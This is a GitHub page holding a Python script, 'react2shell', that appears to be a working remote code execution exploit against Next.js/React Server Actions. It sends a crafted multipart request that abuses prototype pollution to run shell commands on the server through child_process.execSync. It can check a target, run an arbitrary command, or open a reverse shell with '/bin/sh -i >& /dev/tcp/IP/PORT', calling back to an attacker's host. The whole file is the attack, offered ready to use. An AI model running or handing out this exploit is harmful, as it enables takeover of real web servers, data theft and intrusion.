react2shell/react2shell.py at main · xkey8/react2shell · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
#!/usr/bin/env python

import http.client
import uuid
from urllib.parse import *
import argparse
import random

def generate_payload(host, shell_payload):
    boundary = str(uuid.uuid4())
    request_id = uuid.uuid4().hex[:8]
    html_request_id = uuid.uuid4().hex[:21]

    headers = {
        'Content-Type': f"multipart/form-data; boundary={boundary}",
        "Host": host,
        'Next-Action': 'x',
        'X-Nextjs-Request-Id': request_id,
        'X-Nextjs-Html-Request-Id': html_request_id
    }
    shell_payload = shell_payload.replace("'", "\\'") \
                                 .replace('"', '\\"') \
                                 .replace("\\", "\\\\")

    body = (
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="0"\r\n'
        'Content-Type: text/plain; charset=utf-8\r\n'
        '\r\n'

        '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'' + shell_payload + '\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n'
        '\r\n'

        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="1"\r\n'
        'Content-Type: text/plain; charset=utf-8\r\n'
        '\r\n'

        '"$@0"\r\n'
        '\r\n'

        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="2"\r\n'
        'Content-Type: text/plain; charset=utf-8\r\n'
        '\r\n'

        '[]'
        '\r\n'

        f"--{boundary}--\r\n"
    )

    return headers, body

def send_request(url_s, shell_payload):
    url = urlparse(url_s)
    rhost = url.hostname

    headers, body = generate_payload(rhost, shell_payload)

    # Create HTTP/S connection
    if url.scheme == "http":
        rport = url.port or 80
        conn = http.client.HTTPConnection(rhost, rport)

    elif url.scheme == "https":
        rport = url.port or 443
        conn = http.client.HTTPSConnection(rhost, rport)
    else:
        print("Unknown scheme on url")
        exit(1)

    # Send the request
    conn.request("POST", url.path or "/", headers=headers, body=body)
    res = conn.getresponse()
    conn.close()

    return res

def check_vuln(url):
    x,y = random.randint(1,100), random.randint(1,100)
    shell_payload = f"echo $(({x}+{y}))"
    res = send_request(url, shell_payload)

    if f"{x+y}" in res.getheader("x-action-redirect"):
        return True
    else:
        return False

def main():
    print("d8888b. d88888b  .d8b.   .o88b. d888888b .d888b. .d8888. db   db d88888b db      db")
    print("88  `8D 88'     d8' `8b d8P  Y8 `~~88~~' VP  `8D 88'  YP 88   88 88'     88      88")
    print("88oobY' 88ooooo 88ooo88 8P         88       odD' `8bo.   88ooo88 88ooooo 88      88")
    print("88`8b   88~~~~~ 88~~~88 8b         88     .88'     `Y8b. 88~~~88 88~~~~~ 88      88")
    print("88 `88. 88.     88   88 Y8b  d8    88    j88.    db   8D 88   88 88.     88booo. 88booo.")
    print("88   YD Y88888P YP   YP  `Y88P'    YP    888888D `8888Y' YP   YP Y88888P Y88888P Y88888P")
    print()


    parser = argparse.ArgumentParser("react2shell")
    parser.add_argument("-u", "--url", help="Target URL", type=str, required=True)
    parser.add_argument("-i", "--ip", help="Attacker IP", type=str, required=False)
    parser.add_argument("-p", "--port", help="Attacker port", type=int, required=False)
    parser.add_argument("-c", "--cmd", help="Command to execute", type=str, required=False)

    args = parser.parse_args()

    print("Checking... ", end="")
    if check_vuln(args.url):
        print("Target is VULNERABLE!")
    else:
        print("Target does not seem to be vulnerable :(")

    if args.cmd:
        if args.ip or args.port:
            print("WARNING: ip and port are ignored when the command is provided.")
        shell_payload = args.cmd
        send_request(args.url, shell_payload)

    elif args.ip and args.port:
        shell_payload = f"/bin/sh -i >& /dev/tcp/{args.ip}/{args.port} 0>&1"
        send_request(args.url, shell_payload)

    print("Payload successfully sent, check your listener.")


if __name__ == "__main__":
    main()